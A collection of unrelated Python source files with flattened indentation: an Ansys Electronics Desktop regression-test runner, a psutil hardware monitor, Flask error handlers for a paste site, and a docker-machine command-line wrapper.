project_name : str
Name of the project to start.
project_path : str
Path to the project.
project_config : dict
Configuration of project, distribution, etc.
allocated_machines : dict
Machines and cores that were allocated for this task.
"""
self.report_data["projects"][project_name]["time"] = time_now()
self.report_data["projects"][project_name]["status"] = "running"
self.render_main_html()
execute_aedt(
self.version,
self.script,
self.script_args,
project_path,
allocated_machines,
distribution_config=project_config["distribution"],
)
logger.debug(f"Project {project_name} analyses finished. Prepare report.")
# return cores back
for machine in allocated_machines:
self.machines_dict[machine] += allocated_machines[machine]["cores"]
project_report = self.prepare_project_report(project_name, project_path)
self.render_project_html(project_name, project_report)
status = "success" if not project_report["error_exception"] else "fail"
self.report_data["projects"][project_name].update(
{
"link": f"{project_name}.html",
"delta": project_report["slider_limit"],
"time": time_now(),
"status": status,
}
)
self.render_main_html()
self.active_tasks -= 1
def prepare_project_report(self, project_name: str, project_path: str) -> Dict[str, Union[List[Any], int]]:
"""Prepare project report dictionary that is required by ``render_project_html()``.
Parameters
----------
project_name : str
Name of the project.
project_path : str
Path to the project.
Returns
-------
project_report : dict
project report dictionary that is required by ``render_project_html()``.
"""
report_file = Path(project_path).parent / f"{project_name}.json"
project_report: Dict[str, Union[List[Any], Any]] = {
"plots": [],
"error_exception": [],
"mesh": [],
"simulation_time": [],
"slider_limit": 0,
}
project_data = self.check_all_results_present(project_report["error_exception"], report_file, project_name)
if project_report["error_exception"]:
# some keys are missing
return project_report
try:
copy_path_to(str(report_file), str(self.results_path / "reference_folder"))
project_report["error_exception"] += project_data["error_exception"]
for design_name, design_data in project_data["designs"].items():
# get mesh data
self.extract_mesh_or_time_data("mesh", design_data, design_name, project_name, project_report)
# get simulation time
self.extract_mesh_or_time_data(
"simulation_time", design_data, design_name, project_name, project_report
)
# extract XY curve data
self.extract_curve_data(design_data, design_name, project_name, project_report)
except Exception as exc:
project_report["error_exception"].append(str(exc))
return project_report
def check_all_results_present(
self, project_exceptions: List[str], report_file: Path, project_name: str
) -> Dict[str, Any]:
"""Check that report file exists.
Check that project report exists in reference data.
Check that all keys present in the reference data are also in the current run data.
Check that all keys present in the current run data are also in the reference data.
Parameters
----------
project_exceptions : list
List to append with errors.
report_file : Path
JSON file path with results.
project_name : str
Name of the project.
Returns
-------
project_data : dict
Dictionary loaded from .json file.
"""
project_data: Dict[str, Any] = {}
if not report_file.exists():
project_exceptions.append(f"Project report for {project_name} does not exist")
return project_data
with open(report_file) as file:
project_data = json.load(file)
if not self.only_reference:
if project_name not in self.reference_data["projects"]:
project_exceptions.append(f"Project report for {project_name} does not exist in reference file")
else:
compare_keys(
self.reference_data["projects"][project_name],
project_data,
exceptions_list=project_exceptions,
results_type="reference",
)
compare_keys(
project_data,
self.reference_data["projects"][project_name],
exceptions_list=project_exceptions,
results_type="current",
)
return project_data
def extract_curve_data(
self,
design_data: Dict[str, Any],
design_name: str,
project_name: str,
project_report: Dict[str, Union[List[Any], Any]],
) -> None:
"""Extract all XY curves for a particular design.
Mutate ``project_report``.
Parameters
----------
design_data : dict
All the data related to a single design in project_name.
design_name : str
Name of the design.
project_name : str
Name of the project.
project_report : dict
Project report dictionary that is required by 'render_project_html()'.
"""
for report_name, report_data in design_data["report"].items():
for trace_name, trace_data in report_data.items():
for curve_name, curve_data in trace_data["curves"].items():
plot_data = {
"name": f"{design_name}:{report_name}:{trace_name}:{curve_name}",
"id": unique_id(),
"x_label": f'"{trace_data["x_name"]} [{trace_data["x_unit"]}]"',
"y_label": f'"[{trace_data["y_unit"]}]"',
"x_axis": curve_data["x_data"],
"version_ref": -1,
"y_axis_ref": [],
"version_now": str(self.version),
"y_axis_now": curve_data["y_data"],
"diff": [],
"delta": -1,
}
if not self.only_reference:
y_ref_data = self.reference_data["projects"][project_name]["designs"][design_name]["report"][
report_name
][trace_name]["curves"][curve_name]["y_data"]
if len(y_ref_data) != len(curve_data["y_data"]):
msg = (
f"Number of trace points in reference data [{len(y_ref_data)}] isn't equal to "
f"number in current data [{len(curve_data['y_data'])}]"
)
project_report["error_exception"].append(msg)
continue
max_delta = 0
difference = []
for ref, actual in zip(y_ref_data, curve_data["y_data"]):
difference.append(ref - actual)
if actual != 0:
# if 0, just skip, no sense for 'infinite' delta
max_delta = max(max_delta, abs(1 - ref / actual))
max_delta_perc = round(max_delta * 100, 3)
# take always integer since ticks are integers, and +1 to allow to slide
project_report["slider_limit"] = max(project_report["slider_limit"], int(max_delta_perc) + 1)
plot_data.update(
{
"version_ref": self.reference_data["aedt_version"],
"y_axis_ref": y_ref_data,
"diff": difference,
"delta": max_delta_perc,
}
)
project_report["plots"].append(plot_data)
def extract_mesh_or_time_data(
self,
key_name: str,
design_data: Dict[str, Any],
design_name: str,
project_name: str,
project_report: Dict[str, Union[List[Any], Any]],
) -> None:
"""Extract mesh or simulation time information.
Mutate project_report.
Parameters
----------
key_name : str
Mesh or simulation_time, depending on what to extract.
design_data : dict
All the data related to a single design in ``project_name``.
design_name : str
Name of the design.
project_name : str
Name of the project.
project_report : dict
Project report dictionary that is required by ``render_project_html()``.
"""
for variation_name, variation_data in design_data[key_name].items():
for setup_name, current_stat in variation_data.items():
stat_dict = {
"name": f"{design_name}:{setup_name}:{variation_name}",
"current": current_stat,
}
if not self.only_reference:
reference_dict = self.reference_data["projects"][project_name]["designs"][design_name][key_name]
if variation_name not in reference_dict:
project_report["error_exception"].append(
f"Variation ({variation_name}) wasn't found in reference results for design: {design_name}"
)
continue
stat_dict["ref"] = reference_dict[variation_name][setup_name]
project_report[key_name].append(stat_dict)
def allocator(self) -> Iterable[Tuple[str, Dict[str, Dict[str, int]]]]:
"""Generator that yields resources.
Waits until resources are available.
Yields
------
proj_name : str
Name of the project.
allocated_machines : Dict
Allocated machines.
"""
sorted_by_cores_desc = sorted(
self.project_tests_config.keys(),
key=lambda x: self.project_tests_config[x]["distribution"]["cores"],
reverse=True,
)
proj_name = ""
while sorted_by_cores_desc:
if self.active_tasks >= self.max_tasks:
logger.debug("Number of maximum tasks limit is reached. Wait for job to finish")
sleep(4)
continue
allocated_machines = None
for proj_name in sorted_by_cores_desc:
# first try to fit all jobs within a single node for stability, since projects are sorted
# by cores, this ensures that we have optimized resource utilization
allocated_machines = allocate_task_within_node(
self.project_tests_config[proj_name]["distribution"], self.machines_dict
)
if allocated_machines:
break
else:
for proj_name in sorted_by_cores_desc:
# since no more machines to fit the whole project, let's split it across machines
allocated_machines = allocate_task(
self.project_tests_config[proj_name]["distribution"], self.machines_dict
)
if allocated_machines:
break
else:
msg = "Waiting for resources. Cores left per machine:\n"
for machine, cores in self.machines_dict.items():
msg += f"{machine} has {cores} core(s) free\n"
logger.debug(msg)
sleep(5)
if allocated_machines:
for machine in allocated_machines:
self.machines_dict[machine] -= allocated_machines[machine]["cores"]
sorted_by_cores_desc.remove(proj_name)
self.active_tasks += 1
yield proj_name, allocated_machines
def allocate_task(
distribution_config: Dict[str, int], machines_dict: Dict[str, int]
) -> Optional[Dict[str, Dict[str, int]]]:
"""Allocate task on one or more nodes.
Will use MPI and split the job.
If multiple parametric tasks are defined, distribute uniformly.
Parameters
----------
distribution_config : dict
Data about required distribution for the project.
machines_dict : dict
All available machines in pool.
Returns
-------
dict
Allocated machines for the project or ``None`` if not allocated.
"""
if distribution_config.get("single_node", False):
return None
allocated_machines = {}
tasks = distribution_config.get("parametric_tasks", 1)
cores_per_task = int(distribution_config["cores"] / tasks)
to_fill = distribution_config["cores"]
for machine, cores in machines_dict.items():
if tasks == 1:
allocate_cores = cores if to_fill - cores > 0 else to_fill
allocate_tasks = 1
else:
# if tasks are specified, we cannot allocate less cores than in cores_per_task
if cores < cores_per_task:
continue
allocate_tasks = min((cores // cores_per_task, tasks))
tasks -= allocate_tasks
allocate_cores = cores_per_task * allocate_tasks
allocated_machines[machine] = {
"cores": allocate_cores,
"tasks": allocate_tasks,
}
to_fill -= allocate_cores
if to_fill <= 0:
break
if to_fill > 0:
# not enough resources
logger.debug("Not enough resources to split job")
return None
return allocated_machines
def allocate_task_within_node(
distribution_config: Dict[str, int], machines_dict: Dict[str, int]
) -> Dict[str, Dict[str, int]]:
"""Try to fit a task in a node without splitting.
Parameters
----------
distribution_config : dict
Data about required distribution for the project.
machines_dict : dict
All available machines in pool.
Returns
-------
machines : dict
Allocated machines for the project or ``None`` if not allocated.
"""
for machine, cores in machines_dict.items():
if cores - distribution_config["cores"] >= 0:
return {
machine: {
"cores": distribution_config["cores"],
"tasks": distribution_config.get("parametric_tasks", 1),
}
}
return {}
def copy_proj(project_name: str, project_config: Dict[str, Any], dst: str) -> Union[str, List[str]]:
"""Copy project to run location, temp by default.
Parameters
----------
project_name : str
Name of the project to start.
project_config : dict
Configuration of project, distribution, etc.
dst : str
Path where to copy.
Returns
-------
path : str
Location where it was copied.
"""
src = project_config.get("path", project_name + ".aedt")
return copy_path_to(src, dst)
def copy_dependencies(project_config: Dict[str, Any], dst: str) -> None:
"""Copies project dependencies to run location.
Parameters
----------
project_config : dict
Configuration of project, distribution, etc.
dst : str
Path where to copy.
"""
deps = project_config.get("dependencies", None)
if isinstance(deps, list):
for dep in deps:
copy_path_to(dep, dst)
elif isinstance(deps, str):
copy_path_to(deps, dst)
def copy_path_to(src: str, dst: str) -> Union[str, List[str]]:
"""Copy path from src to dst.
If ``src`` is a relative path, preserves relative folder tree.
Parameters
----------
src : str
Path with copy target, relative or absolute.
dst : str
Path where to copy.
Returns
-------
path: str or list
Path to copied file or list with paths if folder is copied.
"""
src_path = Path(src.replace("\\", "/"))
if not src_path.is_absolute() and len(src_path.parents) > 1:
unpack_dst = Path(dst) / src_path.parents[0]
if not src_path.is_file():
unpack_dst /= src_path.name
elif not src_path.is_file():
unpack_dst = Path(dst) / src_path.name
else:
unpack_dst = Path(dst)
src_path = src_path.expanduser().resolve()
if not src_path.exists():
raise FileExistsError(f"File {src_path} doesn't exist")
dst = str(unpack_dst)
mkpath(dst)
if src_path.is_file():
file_path = copy_file(str(src_path), dst)
return file_path[0]
else:
return copy_tree(str(src_path), dst)
def mkdtemp_persistent(*args: Any, persistent: bool = True, **kwargs: Any) -> Any:
"""Provides a context manager to create a temporary/permanent directory depending on 'persistent' argument
Parameters
----------
*args: Any
TemporaryDirectory args
persistent : bool, default=True
If ``True``, create a permanent directory.
**kwargs: Any
TemporaryDirectory keyword arguments.
Returns
-------
tempfile.TemporaryDirectory
Context manager with temp directory from ``tempfile`` module.
"""
if persistent:
@contextmanager
def normal_mkdtemp() -> Iterator[str]:
yield tempfile.mkdtemp(*args, **kwargs)
return normal_mkdtemp()
else:
return tempfile.TemporaryDirectory(*args, **kwargs)
def generator_unique_id() -> Iterator[str]:
"""Generator that incrementally yields new IDs."""
i = 1
while True:
yield f"a{i}"
i += 1
id_generator = generator_unique_id()
def unique_id() -> str:
"""When called runs generator to pick new unique ID.
Returns
-------
id : str
New ID.
"""
return next(id_generator)
def execute_aedt(
version: str,
script: Optional[str] = None,
script_args: Optional[str] = None,
project_path: Optional[str] = None,
machines: Optional[Dict[str, Any]] = None,
distribution_config: Optional[Dict[str, Any]] = None,
) -> None:
"""Execute single instance of Electronics Desktop.
Parameters
----------
version : str
Version to run.
script : str, optional
Path to the script.
script_args : str, optional
Arguments to the script.
project_path : str, optional
Path to the project.
machines : dict, optional
Machine specification for current job.
distribution_config : dict, optional
Distribution configuration for the job.
"""
aedt_path = get_aedt_executable_path(version)
command = [
aedt_path,
]
if machines is not None:
command.append("-machinelist")
host_list = "list=" + ",".join(
[f"{name}:{conf['tasks']}:{conf['cores']}:90%" for name, conf in machines.items()]
)
command.append(host_list)
if distribution_config and distribution_config.get("distribution_types", None):
command.append("-distributed")
dist_type_str = ",".join([dist_type for dist_type in distribution_config["distribution_types"]])
command.append(f"includetypes={dist_type_str}")
tasks = distribution_config.get("multilevel_distribution_tasks", 0)
if tasks > 0:
command.append("maxlevels=2")
command.append(f"numlevel1={tasks}")
if script is not None:
command += [
"-ng",
"-features=SF6694_NON_GRAPHICAL_COMMAND_EXECUTION",
"-RunScriptAndExit",
script,
]
if script_args is not None:
command += [
"-ScriptArgs",
f'"{script_args}"',
]
if project_path is not None:
log_path = os.path.splitext(project_path)[0] + ".log"
command += [
"-LogFile",
log_path,
project_path,
]
logger.debug(f"Execute {subprocess.list2cmdline(command)}")
# filter variable to avoid AEDT thinking it was submitted by scheduler
env = {}
filtered = []
for key, val in os.environ.items():
if (
"sge" not in key.lower()
and "slurm" not in key.lower()
and "lsf" not in key.lower()
and "lsb" not in key.lower()
and "pbs" not in key.lower()
and "PE_HOSTFILE" not in key.lower()
):
env[key] = val
else:
filtered.append(key)
logger.debug(f"Variables filtered: {','.join(filtered)}")
logger.debug(f"Variables applied: {env}")
output = subprocess.check_output(command, env=env)
logger.debug(output.decode())
def get_aedt_executable_path(version: str) -> str:
"""Get platform specific Electronics Desktop executable path.
Parameters
----------
version : str
Version of Electronics Desktop.
Returns
-------
path : str
Path to Electronics Desktop executable.
"""
aedt_env = f"ANSYSEM_ROOT{version}"
aedt_path = os.environ.get(aedt_env, None)
if not aedt_path:
raise ValueError(f"Environment variable {aedt_env} is not set.")
if platform.system() == "Windows":
executable = "ansysedt.exe"
elif platform.system() == "Linux":
executable = "ansysedt"
else:
raise SystemError("Platform is neither Windows nor Linux")
aedt_path = os.path.join(aedt_path, executable)
return aedt_path
def time_now() -> str:
return datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
def compare_keys(
dict_1: Dict[Any, Any],
dict_2: Dict[Any, Any],
exceptions_list: List[str],
*,
dict_path: str = "",
results_type: str = "reference",
) -> None:
"""Compare that keys from ``dict_1`` are present in ``dict_2`` recursively.
Mutates ``exceptions_list`` and appends errors if key is not present.
"""
if dict_path:
dict_path += "->"
for key, val in dict_1.items():
if key not in dict_2:
exceptions_list.append(f"Key '{dict_path}{key}' does not exist in {results_type} results")
continue
if isinstance(val, dict):
compare_keys(val, dict_2[key], exceptions_list, dict_path=f"{dict_path}{key}", results_type="reference")
def parse_arguments() -> argparse.Namespace:
"""Parse CLI arguments.
Returns
-------
args : argparse.Namespace
Validated arguments.
"""
parser = argparse.ArgumentParser()
parser.add_argument("--aedt-version", required=True, help="Electronics Desktop version to test, e.g. 221")
parser.add_argument("--config-file", required=True, help="Project config file path")
parser.add_argument("--reference-file", help="Reference results file path")
parser.add_argument("--only-reference", action="store_true", help="Only create reference results")
parser.add_argument(
"--only-validate", action="store_true", help="Only validate current --config-file [and --reference-file]"
)
parser.add_argument(
"--suppress-validation",
action="store_true",
help="Suppress validation of config file and reference file (DANGEROUS)",
)
parser.add_argument(
"--rsm-is-started",
action="store_true",
help="When job uses multiple nodes and user started RSM service on each node manually",
)
parser.add_argument(
"--rsm-path",
help="When job uses multiple nodes tool requires RSM, RSM will be auto-started from provided path",
)
parser.add_argument(
"--out-dir", "-o", help="Output directory for reports and project files (if --save-sim-data set)"
)
parser.add_argument(
"--save-sim-data", "-s", action="store_true", help="Save simulation data under output dir (--out-dir flag)"
)
parser.add_argument("--max-cores", "-c", type=int, help="total number of cores limit", default=99999)
parser.add_argument("--max-tasks", "-t", type=int, help="total number of parallel tasks limit", default=99999)
parser.add_argument("--debug", action="store_true", help="Adds additional DEBUG logs")
cli_args = parser.parse_args()
log_level = 10 if cli_args.debug else 20
set_logger(logging_file=CWD_DIR / "aedt_test_framework.log", level=log_level, pyaedt_module=None)
if not cli_args.only_reference and not cli_args.reference_file:
raise ValueError("Either set --only-reference flag or provide path via --reference-file")
if cli_args.rsm_path and cli_args.rsm_is_started:
raise ValueError("--rsm-is-started and --rsm-path are mutually exclusive")
if cli_args.suppress_validation and cli_args.only_validate:
raise ValueError("--only-validate and --suppress-validation are mutually exclusive")
if not (cli_args.max_cores or cli_args.max_tasks):
logger.warning(
"No limits are specified for current job. This may lead to failure if you lack of license or resources"
)
aedt_version_pattern = re.compile(r"\d\d\d$")
if not aedt_version_pattern.match(cli_args.aedt_version):
raise ValueError("Electronics Desktop version value is invalid. Valid format example: 221")
if not os.path.isfile(cli_args.config_file):
raise ValueError(f"Configuration file does not exist: {cli_args.config_file}")
if cli_args.save_sim_data and not cli_args.out_dir:
raise ValueError("Saving of simulation data was requested but output directory is not provided")
return cli_args
if __name__ == "__main__":
main()
|
monitor.py
|
import raylink
import psutil
import schedule
import threading
import time
from tabulate import tabulate
from psutil._common import bytes2human
import subprocess as sp
import tracemalloc
class HWM(object):
@staticmethod
def add_cap(cap, log):
log = '-' * 20 + f'\n{cap}\n' + '-' * 20 + '\n' + log + '\n'
return log
@staticmethod
def cpu():
log = [['Usage', str(psutil.cpu_percent())],
['Load Avg', ', '.join([str(round(i, 2)) for i in psutil.getloadavg()])]]
log = tabulate(log, tablefmt='presto', colalign=['left', 'right'])
log = HWM.add_cap('CPU', log)
return log
@staticmethod
def mem():
mem = psutil.virtual_memory()
log = []
for name in mem._fields:
value = getattr(mem, name)
if name != 'percent':
value = bytes2human(value)
log.append([name.capitalize(), value])
log = tabulate(log, tablefmt='presto', colalign=['left', 'right'])
log = HWM.add_cap('Memory', log)
return log
@staticmethod
def disk():
disk_info = sp.getoutput('df -h')
lines = disk_info.split('\n')
headers = list(filter(lambda x: x != '', lines[0].split(' ')))
data = []
for l in lines[1:]:
data.append(list(filter(lambda x: x != '', l.split(' '))))
log = tabulate(data, headers=headers, tablefmt='presto')
log = HWM.add_cap('Disk', log)
return log
@staticmethod
def proc():
log = ''
attrs = ['pid', 'ppid', 'cpu_percent', 'memory_percent', 'name', 'cmdline', 'memory_info']
headers = ['pid', 'ppid', 'cpu', 'mem', 'name', 'cmdline']
mem_fields = []
keys = None
data = []
count = 0
for proc in psutil.process_iter():
try:
if proc.memory_info() is None:
continue
except:
continue
d = proc.as_dict(attrs=attrs)
d['cmdline'] = ' '.join(d['cmdline'])
d['cmdline'].strip()
if len(d['cmdline']) > 30:
d['cmdline'] = d['cmdline'][:30] + '...'
d['name'].strip()
if len(d['name']) > 15:
d['name'] = d['name'][:15] + '...'
d['cpu'] = round(d.pop('cpu_percent'), 2)
d['mem'] = round(d.pop('memory_percent'), 2)
mem = d.pop('memory_info')
for name in mem._fields:
if count == 0:
mem_fields.append(name)
value = getattr(mem, name)
value = bytes2human(value)
d[name] = value
if keys is None:
keys = headers + mem_fields
data.append(dict(zip(keys, [d[k] for k in keys])))
count += 1
cpu_data = sorted(data, key=lambda x: x['cpu'], reverse=True)[:5]
_log = tabulate([list(d.values()) for d in cpu_data], headers=keys,
tablefmt='presto', colalign=['left', 'right'])
log += HWM.add_cap('CPU TOP 5', _log)
mem_data = sorted(data, key=lambda x: x['mem'], reverse=True)[:5]
_log = tabulate([list(d.values()) for d in mem_data], headers=keys, tablefmt='presto')
log += HWM.add_cap('MEM TOP 5', _log)
return log
class TM(object):
def __init__(self):
self.snapshot = None
def start(self):
tracemalloc.start()
def stat(self):
log = ''
snapshot = tracemalloc.take_snapshot()
top_stats = snapshot.statistics('lineno')
log += "[ Top 10 ]\n"
for stat in top_stats[:10]:
log += f'{stat}\n'
if self.snapshot:
top_stats = snapshot.compare_to(self.snapshot, 'lineno')
log += "[ Top 10 differences ]\n"
for stat in top_stats[:10]:
log += f'{stat}\n'
self.snapshot = snapshot
return log
class MemSnapshot(object):
def __init__(self, memory_info, code_info):
self.memory_info = memory_info
self.code_info = code_info
self.attrs = memory_info._fields
@staticmethod
def __calc(al_func, c_func):
def wrapper(a, b):
values = []
for _a in a.attrs:
a_v = getattr(a.memory_info, _a)
b_v = getattr(b.memory_info, _a)
res = al_func(a_v, b_v)
values.append(res)
return MemSnapshot(type(a.memory_info)(*values), c_func(a.code_info, b.code_info))
return wrapper
def __sub__(self, other):
return self.__calc(lambda a, b: a - b, lambda a, b: f'{b} -> {a}')(self, other)
def __add__(self, other):
assert self.code_info == other.code_info
return self.__calc(lambda a, b: a + b, lambda a, b: f'{a}')(self, other)
def __str__(self):
s = []
for a in self.attrs:
value = getattr(self.memory_info, a)
if value < 0:
value = '-' + bytes2human(abs(value))
else:
value = bytes2human(value)
s.append(f'{a}={value}')
return ', '.join(s)
class ProcMem(object):
def __init__(self):
self.p = psutil.Process()
self.p.memory_info()
self.last_snapshot = None
self.diff_stat = {}
def snapshot(self, first=False):
import sys
frame = sys._getframe(1)
code_info = f'{frame.f_code.co_filename}:{frame.f_lineno}'
mem = self.p.as_dict(attrs=['memory_info'])['memory_info']
snapshot = MemSnapshot(mem, code_info)
if not first and self.last_snapshot:
diff = snapshot - self.last_snapshot
if diff.code_info not in self.diff_stat:
self.diff_stat[diff.code_info] = diff
else:
self.diff_stat[diff.code_info] += diff
self.last_snapshot = snapshot
def stat(self):
stat = []
for k, v in self.diff_stat.items():
stat.append(f'{k} {v}')
return '\n'.join(stat)
class Telescreen(raylink.OutlineNode):
TYPE = 'telescreen'
def setup(self):
schedule.every(1).minutes.do(self.on_tick)
def run():
while True:
schedule.run_pending()
time.sleep(1)
job_thread = threading.Thread(target=run, daemon=True)
job_thread.start()
def on_tick(self):
log = [HWM.cpu(), HWM.mem(), HWM.disk(), HWM.proc()]
self._llogger.debug('\n' + ''.join(log))
class OldBro(raylink.SuperVillain):
TYPE = 'oldbro'
def setup(self):
raylink.SuperVillain.setup(self, Telescreen)
|
errorhandlers.py
|
import threading
import traceback
from pygments import highlight
from pygments.formatters import HtmlFormatter
from pygments.lexers import MarkdownLexer
from flask import url_for, render_template, request, redirect, copy_current_request_context
from flask_wtf.csrf import CSRFError
from flask_mail import Message
from app.util import mail
unknown_error_text = """# Uh Oh!
**Shit really hit the fan. Some sort of unknown error just happened.**"""
not_found_text = """# Not Found
**There doesn't seem to be anything here.**"""
method_not_allowed_text = """# Method Not Allowed
**You can't do that here.**"""
rate_limit_text = """# Too Many Requests
**Limit: {}**"""
csrf_message = """# Bad Request
**{}**"""
def setup_handlers(app):
@app.errorhandler(400)
def bad_request(ex):
if request.headers.get('Accept'):
return '400 missing text', 400, {'Content-type': 'text/plain; charset=utf-8'}
return redirect(url_for('paste.edit', _external=True))
@app.errorhandler(CSRFError)
def missing_csrf(e):
return render_template(
'paste_show.html',
text=highlight(csrf_message.format(e.description), MarkdownLexer(), HtmlFormatter()),
lines=csrf_message.count('\n') + 1
), 400
@app.errorhandler(404)
def not_found(ex):
return render_template(
'paste_show.html',
text=highlight(not_found_text, MarkdownLexer(), HtmlFormatter()),
lines=not_found_text.count('\n') + 1,
), 404
@app.errorhandler(405)
def method_not_allowed(ex):
return render_template(
'paste_show.html',
text=highlight(method_not_allowed_text, MarkdownLexer(), HtmlFormatter()),
lines=method_not_allowed_text.count('\n') + 1,
), 405
@app.errorhandler(429)
def rate_limit(ex):
text = rate_limit_text.format(app.config.get('RATELIMIT_DEFAULT'))
return render_template(
'paste_show.html',
text=highlight(text, MarkdownLexer(), HtmlFormatter()),
lines=text.count('\n') + 1
), 429
@app.errorhandler(500)
@app.errorhandler(Exception)
def unknown_error(ex):
@copy_current_request_context
def send_message(message):
try:
mail.send(message)
except Exception:
pass # Ignore, we're going to log it anyway
tb = traceback.format_exc()
message = Message(
subject=f'Error From {request.host_url}',
recipients=[app.config['MAIL_RECIPIENT']],
body=render_template('email/error.txt.jinja', tb=tb),
html=render_template('email/error.html.jinja', tb=tb)
)
thread = threading.Thread(target=send_message, args=(message,))
thread.start()
app.logger.exception(f'Unknown error at endpoint: {request.method} {request.full_path}')
return render_template(
'paste_show.html',
text=highlight(unknown_error_text, MarkdownLexer(), HtmlFormatter()),
lines=unknown_error_text.count('\n') + 1
), 500
|
cl_api.py
|
import logging
import subprocess
import threading
import time
import os
import queue
import re
from datetime import datetime, timedelta
class DockerMachineError(Exception):
"""
Exception thrown by machine components.
"""
def __init__(self, task, message):
self.task = task
self.message = message
def __str__(self):
return self.message
def __repr__(self):
return "task '%s': %s" % (self.task, self.message)
class DockerStreamReader:
"""
External thread to help pull out text from machine task processes.
NOTE: this extra thread is required, since reading from STDERR and STDOUT could block.
TODO: always wait a little to make sure we do not miss output on tasks that end quickly
"""
ansi_escape = re.compile(r'(\x9B|\x1B\[)[0-?]*[ -\/]*[@-~]')
def __init__(self, stream_in):
self._queue = queue.Queue()
self._stream = stream_in
self._thread = threading.Thread(target=self._reader_thread, daemon=True)
self._thread.start()
def _format_text(self, text):
"""
Remove ANSI colour codes, etc
"""
return self.ansi_escape.sub('', text)
def _reader_thread(self):
"""
Read all data from stream and add to internal readline queue
"""
while not self._stream.closed:
try:
text = self._stream.readline()
if text:
self._queue.put(self._format_text(text.strip('\n')))
else:
time.sleep(1) # wait a little if nothing available
except Exception:
pass
def get_line(self):
"""
Returns next line in reader queue or None.
"""
try:
return self._queue.get(block=False)
except queue.Empty:
return None
def wait(self):
"""
Close stream and wait for thread to stop.
"""
try:
self._stream.close()
self._thread.join(timeout=2)
except Exception:
pass
class DockerMachineTask:
"""
Wrapper for a task process run by machine.
"""
default_bin = 'docker-machine'
default_timeout = 540 # seconds
def __init__(self, name='', cwd='./', bin=None, cmd='', params=[], timeout=None, allowed_to_fail=False, output_cb=None):
"""
:param name: task name
:param cwd: working directry (docker-compose root)
:param cmd: first argument
:param params: command arguments
:param env: environment used for sub-process call
:param timeout: seconds to wait for sub-process call to complete
:param callback: func(task_output_text)
"""
self._name = name
self._cwd = cwd
self._bin = bin or self.default_bin
self._cmd = cmd
self._params = params
self._timeout = timeout or self.default_timeout
self._output_cb = output_cb
if self._output_cb:
self._output = list()
else:
self._output = None
self._returncode = None
self._logger = logging.getLogger(self._name)
self._allowed_to_fail = allowed_to_fail
def __str__(self):
return "%s %s: %d" % (self._bin, self._cmd, self._returncode)
def _process_output(self, stdout_queue, stderr_queue):
"""
Process all output from stream readers.
"""
while True:
stdout = self._stdout_reader.get_line()
if stdout is not None:
stdout_queue.put(stdout)
if self._output is not None:
self._output.append(stdout)
stderr = self._stderr_reader.get_line()
if stderr is not None:
stderr_queue.put(stderr)
if self._output is not None:
self._output.append(stderr)
if not stdout and not stderr:
break
def _finish_output(self, stdout_queue, stderr_queue):
"""
Wait for process to finish and read last bit of output.
"""
self._process.wait()
self._stdout_reader.wait()
self._stderr_reader.wait()
self._process_output(stdout_queue, stderr_queue)
def call(self, env, stdout_queue, stderr_queue):
"""
Call process and block until done.
"""
args = [self._bin, self._cmd] + self._params
self._logger.debug("calling <%s> ...", args)
# call process
self._process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, cwd=self._cwd, text=True)
self._stdout_reader = DockerStreamReader(self._process.stdout)
self._stderr_reader = DockerStreamReader(self._process.stderr)
self._popen_start_time = datetime.now()
self._popen_timeout = timedelta(seconds=self._timeout)
while True:
# poll process for status and output
self._logger.debug("polling ...")
self._process_output(stdout_queue, stderr_queue)
self._returncode = self._process.poll()
# check process status
if self._returncode is not None:
if self._returncode == 0 or self._allowed_to_fail:
self._finish_output(stdout_queue, stderr_queue)
# success - task callback to process output
if self._output_cb:
self._output_cb(os.linesep.join(self._output))
self._logger.debug("done")
break
else:
# failed - exception
self._logger.error("failed - return code %s!", self._returncode)
self._process.kill()
self._finish_output(stdout_queue, stderr_queue)
raise DockerMachineError(self, 'Task call failed - return code %s!' % self._returncode)
# check process timeout
if datetime.now() - self._popen_start_time > self._popen_timeout:
self._logger.error("timeout!")
self._process.kill()
self._finish_output(stdout_queue, stderr_queue)
raise DockerMachineError(self, 'Task call timeout.')
time.sleep(1)
class DockerMachine:
"""
Docker Machine CLI wrapper.
Manages docker machine provisioning, setup and tasks.
"""
def __init__(self, name='', cwd='./', config={}, user_env={}):
"""
:param name: str: machine name
:param cwd: path: machine working directory (in which processes will run)
:param config: dict: docker-machine config
:param user_env: dict: user suplied environment variables
User supplied environment variables are combined with current OS environment
and then supplied to sub-process calls.
"""
self._name = name
self._cwd = cwd
self._config = config
self._logger = logging.getLogger(self._name)
self._machine_status = ''
self._machine_ip = ''
self._service_logs = None
self._os_env = os.environ.copy()
self._user_env = user_env.copy()
self._machine_env = {}
self._task_list = queue.Queue()
self._stdout_queue = queue.Queue()
self._stderr_queue = queue.Queue()
self._idle = True
threading.Thread(target=self._machine_thread, daemon=True).start()
# add first tasks to provision and setup machine
self.tskProvisionMachine()
self.tskStartMachine()
self.tskGetMachineIp()
self.tskGetMachineEnv()
self.tskGetMachineStatus()
def __str__(self):
return "Docker machine %s, %s, %s" % (self.name(), self.ip(), self.status())
def _parse_env_text(self, input):
"""
Parse 'export key="value"\n...' type multi-line strings and return updated environment dictionary.
"""
output = {}
lines = input.splitlines()
for line in lines:
if line.startswith('export'):
line = line.lstrip('export')
words = line.split('=')
if len(words) == 2:
key = words[0].strip(' ')
value = words[1].strip('\" ')
output[key] = value
return output
def _machine_thread(self):
"""
Machine task thread (executes tasks queued with '_add_task').
"""
while True:
try:
task = self._task_list.get(timeout=1)
self._idle = False
try:
self._logger.info("calling task '%s' ...", task._name)
task.call(env=self.env(),
stdout_queue=self._stdout_queue,
stderr_queue=self._stderr_queue)
except Exception as ex:
self._logger.exception("failed to execute task '%s'!. [%s] %s", task._name, type(ex).__name__, str(ex))
self._task_list.task_done()
except queue.Empty:
self._logger.debug("waiting for tasks ...")
self._idle = True
def name(self):
"""
Returns machine name (read-only)
"""
return self._name
def config(self):
"""
Returns machine config (provides specific provisioning details; read-only)
"""
return self._config
def cwd(self):
"""
Returns local machine services working folder (docker-compose file location; read-only)
"""
return self._cwd
def ip(self):
"""
Returns the IP of the remote machine
"""
return self._machine_ip
def env(self):
"""
Returns the ENV vars of the remote machine
"""
return {
**self._os_env,
**self._user_env,
**self._machine_env
}
def status(self):
"""
Returns the current status of the machine
"""
return self._machine_status
def logs(self):
return self._service_logs
def add_task(self, task):
"""
Machine task execution thread
"""
self._task_list.put(task)
def wait(self):
"""
Blocks caller until all scheduled tasks have finished
"""
self._task_list.join()
